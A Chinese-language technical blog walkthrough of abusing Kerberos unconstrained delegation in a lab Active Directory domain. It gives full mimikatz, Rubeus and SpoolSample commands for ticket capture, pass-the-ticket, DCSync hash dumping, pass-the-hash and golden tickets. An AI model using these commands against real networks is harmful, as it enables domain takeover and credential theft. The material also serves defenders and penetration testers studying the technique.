【技术分享】非约束委派

前言：

域委派是指将域内用户的权限委派给服务账户，使得服务账户能以用户的权限在域内开展活动。委派主要分为非约束委派和约束委派两种方式，还有一种是基于资源的约束委派。本篇文章，小星将和大家分享非约束委派的利用过程。

01非约束委派流程

非约束委派的请求过程如图，当service1的服务账号开启了非约束委派后，user访问service1时，service1会将user的TGT保存到内存中，然后service1就可以利用TGT以user的身份访问去访问域中的任何user可以访问的服务。

详细的流程可以查看微软手册。

链接如下：[MS-SFU]: Protocol Overview | Microsoft Learn

02非约束委派攻击流程
域环境

当前域：test.com

域控：dc-2016(IP:10.10.90.10) test\administrator

域内主机(配置了非约束委派)：

web-2016(IP:10.10.90.20)test\mssql

1. 配置和查找非约束委派主机：在Windows系统中，只有服务账号和主机账号的属性才有委派功能，普通⽤户默认是不含此功能。现在我们将web-2016这个主机⽤户设置为非约束委派。

2. 查找域内非约束委派用户和计算机：

#查找域中配置非约束委派的用户，过滤出cn和distinguishedName属性。

AdFind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

#查找域中配置非约束委派的主机,过滤出cn和distinguishedName属性。

AdFind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

3. 查询主机web-2016，发现被设置了非约束委派。使⽤dc或者域管去登录 web-2016，可在 web-2016上留存票据凭证，随后让域控模拟访问被设置了⾮约束委派的机器。

Enter-PSSession -ComputerName web-2016

4. 域控模拟访问被设置了约束委派的机器后，此时域管理员的 TGT 已经缓存在 web-2016机器上了，域管的凭证也已缓存于⽬标机器。使⽤域内机器登录本地管理员，导出相关凭证、清除⼀下当前票据缓存。

mimikatz.exe "privilege::debug" "kerberos::purge" "exit"

5.使⽤mimikatz以dump所有票据。

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

6.此时[0;47cb77]-2-0-60a10000-Administrator@krbtgt-TEST.COM.kirbi就是域管理员administrator的TGT。

7.访问域控文件失败。

8. 使用mimikatz通过ptt将TGT注入到当前会话中。

kerberos::ptt [0;47cb77]-2-0-60a10000-Administrator@krbtgt-TEST.COM.kirbi

9.成功访问域控。

03非约束委派+Spooler打印机服务

一般情况下，高权限用户是不会主动访问我们的，所以说上述情况出现机率较少。在特定情况下，我们可以利用splooer服务让域控主动连接。

默认开启Splooer服务，域用户可以利用windows打印系统远程协议(MS-RPRN)来强制任何运行了Splooer服务的域内机器，通过kerberos或ntlm对任何目标进行身份验证，这就是该攻击方式的原理。

1.如下所示，Splooer服务默认是已开启，并以system权限运行。

2.在web-2016上以本地管理员身份运行Rubeus，对域控机器账户的登录进行监听。

Rubeus.exe monitor /interval:1 /filteruser:dc-2016$

#我们可以用Rubeus来监听EvevtID为4624的时间，这样可以第一时间截取到TGT

# /interval:1 设置监听时间为1秒

# /filteruser 监听对象为域控，注意后面有$，如果不设置监听对象就监听所有的TGT

#dc-2016$为域控主机的名字加$

注意：Rubeus.exe需要以本地管理员身份运行，否则会报错。

3.利用SpoolSample工具强制让域控(dc-2026)向本机(web-2016)验证身份。

SpoolSample.exedc-2016 web-2016

这里要注意非约束委派机器是需要关闭防火墙，否则以域用户的身份执行SpoolSample.exe会返回下述错误，无法接收到tickets。

4.关闭防火墙后再次运行。

5.切换到web-2016本地管理员，Rubeus已经捕获到了域控的TGT。该TGT是base64的，有两种方法可以导入到内存中。此处base64字符串导入票据需要进行处理，去除空格和换行符\n

方法1：

1.使用powershell的base64转换功能。

[IO.File]::WriteAllBytes("dc-2016.kirbi",[Convert]::FromBase64String("捕获到的base64编码"))

2. 执行命令后，会在当前目录下生成dc-2016.kirbi票据，使用mimikatz导入票据即可。

kerberos::ptt dc-2016.kirbi

kerberos::list

方法2:

1.使用Rubeus导入TGT。

Rubeus.exe ptt /ticket:base64

2. 查看票据，此时票据已经成功写入到内存中，但是依然无法访问域控的文件。

3.此处生成的 TGT，相当于域控真正赋予了我们administrator本地管理员权限，所以此处我们可以使用命令来导出域内账号hash。

4. 以本地管理员权限运行mimikatz进行dcsync，成功获取域内账号ntlm哈希值。

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

5.如果当前用户拥有管理员权限，我们可以使用PTH攻击。

mimikatz.exe"privilege::debug""sekurlsa::pth/user:administrator/domain:test.com/ntlm:0ebc63860c8167877a03a68df53b3bf1"

#成功后会弹出一个cmd窗口，此时和域控制器建立ipc无需密码

6. 如果是普通的域用户，可使用黄金票据,

mimikat.exe "kerberos::golden /user:administrator /domain:test.com /sid:S-1-5-21-1348005725-2953300805-2723764712 /krbtgt:61e6be9a1ae07871c40cbd8e18181128 /ptt"